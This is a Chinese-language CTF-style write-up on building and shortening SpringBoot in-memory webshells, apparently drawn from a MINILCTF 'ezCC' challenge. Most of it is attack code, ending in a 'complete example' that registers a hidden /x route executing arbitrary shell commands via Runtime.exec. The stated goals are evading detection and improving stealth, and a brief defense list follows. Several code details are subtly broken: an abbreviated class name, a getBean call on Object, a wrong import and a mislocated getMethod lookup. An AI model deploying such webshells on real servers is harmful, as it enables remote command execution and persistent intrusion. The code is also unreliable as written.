SpringBoot内存马缩短技术分析 - 从MINILCTF ezCC学习

题目背景分析

该题目来自MINILCTF的ezCC挑战，主要考察SpringBoot环境下内存马的构造和缩短技术。内存马(内存Webshell)是一种无文件攻击技术，通过直接修改内存中的组件实现持久化控制。

关键知识点

1. SpringBoot内存马基本原理

SpringBoot内存马通常通过以下方式实现：

• 动态注册Controller
• 修改已有Controller的映射
• 利用Filter/Servlet机制注入恶意逻辑

2. 内存马缩短技术

缩短内存马的主要目的是：

• 减少特征，规避检测
• 适应特殊环境限制(如长度限制)
• 提高隐蔽性

常见缩短技术包括：

2.1 反射调用简化

// 传统方式
Class<?> clazz = Class.forName("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping");
Method method = clazz.getMethod("getMappingRegistry");

// 缩短方式
Class c = Class.forName("org.s.w.s.m.m.a.RequestMappingHandlerMapping");
Method m = c.getMethod("getMappingRegistry");

2.2 链式调用压缩

// 传统方式
RequestMappingInfo.Builder builder = RequestMappingInfo.paths("/evil").methods(RequestMethod.GET);
RequestMappingInfo info = builder.build();

// 缩短方式
RequestMappingInfo info = RequestMappingInfo.paths("/evil").methods(RequestMethod.GET).build();

2.3 匿名类简化

// 传统方式
public class EvilController {
    @RequestMapping("/evil")
    public String evil() {
        return "evil";
    }
}

// 缩短方式
new Object() {
    @RequestMapping("/evil")
    String evil() {
        return "evil";
    }
};

3. ezCC中的具体实现

根据题目分析，ezCC可能使用了以下技术：

1. 动态注册Controller：

   • 通过RequestMappingHandlerMapping动态添加路由
   • 使用反射获取关键对象实例

2. 字节码精简：

   • 去除不必要的修饰符
   • 使用最短的变量名
   • 内联方法调用

3. 依赖减少：

   • 仅保留必要的Spring依赖
   • 避免完整Controller结构

完整示例代码

// 极简内存马示例
import org.springframework.web.bind.annotation.*;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.http.RequestMethod;

public class MiniMemShell {
    public static void inject() throws Exception {
        // 获取上下文
        Object ctx = org.springframework.web.context.ContextLoader.getCurrentWebApplicationContext();
        
        // 获取RequestMappingHandlerMapping
        RequestMappingHandlerMapping r = ctx.getBean(RequestMappingHandlerMapping.class);
        
        // 创建恶意路由
        RequestMappingInfo info = RequestMappingInfo
            .paths("/x")
            .methods(RequestMethod.GET)
            .build();
            
        // 注册恶意Controller
        r.registerMapping(info, new Object() {
            @GetMapping("/x")
            String x(String cmd) throws Exception {
                return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream())
                    .useDelimiter("\\A").next();
            }
        }, MiniMemShell.class.getMethod("x", String.class));
    }
}

防御措施

1. 运行时防护：

   • 监控动态Controller注册行为
   • 检查异常的URL映射

2. 静态检测：

   • 扫描可疑的反射调用
   • 检查异常的类加载行为

3. 加固措施：

   • 禁用不必要的反射功能
   • 限制动态类加载

总结

通过MINILCTF ezCC题目，我们学习了SpringBoot环境下内存马的多种缩短技术，这些技术可以显著减小内存马的体积和特征，提高隐蔽性。防御方需要从多个维度进行检测和防护，才能有效应对这类攻击。

扩展阅读

1. Spring官方文档 - Handler Mapping
2. Java反射机制深入解析
3. 内存马检测技术白皮书